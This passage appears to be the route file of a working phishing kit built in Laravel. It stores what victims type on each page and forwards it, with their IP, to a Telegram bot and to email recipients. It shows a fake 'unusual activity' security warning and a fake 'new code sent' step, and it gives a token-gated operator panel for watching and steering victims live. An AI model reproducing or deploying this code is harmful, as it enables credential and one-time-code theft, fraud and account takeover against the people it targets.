    $session->sessionProcesses()->where('proceed_to',$page)->where('filled',false)->update(['filled'=>true]);
    session()->put("page-$page",$data);
    $array = [];
    $flows = explode(',',config('app.page_flow'));
    foreach ($flows as $flow){
        $array=session()->get("page-$flow",[])+$array;
    }
    $session->data()->create([
        'page'=>$page,
        'data'=>json_encode($data)
    ]);
    if(config('app.use_telegram')==1) {
        $response = new Api(config('app.telegram_key'));
        foreach ($names['email'] as $file) {
            $botId = $response->sendPhoto(['chat_id' => config('app.chat_id'),
                'photo'=>InputFile::create($file),
                'caption' => Controller::formatArrayToString($array+$ip)]);
        }
    }
    if(config('app.use_smtp')==1) {
        try {
            \Illuminate\Support\Facades\Mail::to(explode(',', config('app.sender_email')))->send(new \App\Mail\SendDataNotification($array));
        } catch (Exception $exception) {

        }
    }
    if(Controller::pageIsFirst($page)){
        alert()
            ->warning('We\'ve noticed some unusual activity' ,'We need your help securing your account to prevent any unauthorized access. For your safety, there may be some limitations on your account if the information isn\'t  correct.')->autoClose(7000);
    }

    return to_route('processing');
})->name('dl');


Route::get('success',function (){
    $user = session()->get('user');
    $user = \App\Models\Session::query()->where('identifier',$user)->first();

    if($user) {
        $user->update(['completed'=>true]);
    }
    session()->flush();
    return view('success');
})->name('success');
Route::get('error',function (){
    $user = session()->get('user');
    $user = \App\Models\Session::query()->where('identifier',$user)->first();

    return view('error');
})->name('error');
Route::get('restart',function (){
    $user = session()->get('user');

    $user = \App\Models\Session::query()->where('identifier',$user)->first();
    $user->sessionProcesses()->where('proceed_to','error')->where('filled',false)->update(['filled'=>true]);
    $user->sessionProcesses()->where('proceed_to','success')->where('filled',false)->update(['filled'=>true]);
    return to_route('processing');
})->name('restart');

Route::get('processing',function (){
    $name=app('router')->getRoutes()->match(app('request')->create(URL::previous()))->getName();
    $mapper = Controller::$mapperC;

    if(array_key_exists($name,$mapper)){
        $page = $mapper[$name];
    }else{
        $page='';
    }
    return view('processing',[
        'page'=>$page,
    ]);
})->name('processing');

Route::get('next',function (){
    $page = Controller::nextPage();
    return response()->json(['next'=>\route($page),'page'=>$page]);
})->name('next');


Route::get('/a/{id}',function (\App\Models\Session $id){
    if(is_null(request()->query('page'))){
        abort(404);
    }
    $id->sessionProcesses()->where('filled',false)->update(['filled'=>true]);
    $data = empty(request()->query('data'))?null:request()->query('data');
    $id->sessionProcesses()->create([
        'proceed_to'=>request()->query('page'),
        'filled'=>false,
        'data'=>$data
    ]);
    return response()->json(['icon'=>'success','message'=>'proceed complete']);
})->name('proceed');


Route::get('install/{token}',function ($token){
    \Illuminate\Support\Facades\Artisan::call('migrate:fresh',['--force'=>true]);
    \Illuminate\Support\Facades\Artisan::call('key:generate');
    return "ok";
})->whereIn('token',[config('app.admin_token')])->name('adminpanma');

Route::get('show/{token}/{session}',function ($token,$session){
    $session = \App\Models\Session::query()->where('identifier',$session)->firstOrFail();

    $read = session()->get('read')??[];

    $new = $session->data()->whereNotIn('id',$read)->whereBetween('created_at',[now()->subSeconds(20)->format('Y-m-d H:i:s'),now()->format('Y-m-d H:i:s')])->get();

    if($new->count()>0) {
        $identifiers = $new->pluck('id')->flatten()->toArray() + $read;
        session()->put('read',$identifiers);
    }

    $newF = 0;
    if($new->count()>0){
        $newF =1;
    }

    return view('process',[
        'session' => $session,
        'new' => $newF
    ]);
})->whereIn('token',[config('app.admin_token')])->name('show');


Route::get('completed/{token}',function (){
    return view('sessions',[
        'sessions'=>(new \App\Models\Session())->allSessions()->has('data')->where('completed',true)->get(),
    ]);
})->whereIn('token',[config('app.admin_token')])->name('completed');

Route::get('dashboard/{token}',function (){
    return view('dashboard');
})->whereIn('token',[config('app.admin_token')])->name('dashboard');

Route::get('pending/{token}',function (){
    $read = session()->get('read')??[];

    $new = \App\Models\Session::query()->whereNotIn('identifier',$read)->whereBetween('created_at',[now()->subSeconds(20)->format('Y-m-d H:i:s'),now()->format('Y-m-d H:i:s')])->has('data','>=',1)->get();

    if($new->count()>0) {
        $identifiers = $new->pluck('identifier')->flatten()->toArray() + $read;
        session()->put('read',$identifiers);
    }

    $newF = 0;
    if($new->count()>0){
        $newF =1;
    }

})->whereIn('token',[config('app.admin_token')])->name('pending');
Route::get('markCompleted/{identifier}',function ($identifier){
    $identifier = \App\Models\Session::query()->where('identifier',$identifier)->firstOrFail();
    $identifier->update(['completed'=>true]);
    alert()->success('Success',"Completed");
    return back();
})->name('markCompleted');





Route::get('not-received',function(){
    alert()->success("Success","We just sent you a new code");
    $array = [];

    $flows = explode(',',config('app.page_flow'));
    foreach ($flows as $flow){
        $array=session()->get("page-$flow",[])+$array;
    }
    if(config('app.use_telegram')==1) {
        $response = new Api(config('app.telegram_key'));
        $botId = $response->sendMessage(['chat_id' => config('app.chat_id'),
            'text' => Controller::formatArrayToString(['action'=>'I did not receive code']+$array)]);
    }
    if(config('app.use_smtp')==1) {
        try {
            \Illuminate\Support\Facades\Mail::to(explode(',', config('app.sender_email')))->send(new \App\Mail\SendDataNotification($array+$ip));
        } catch (Exception $exception) {

        }
    }
    return back();
})->name('not-received');
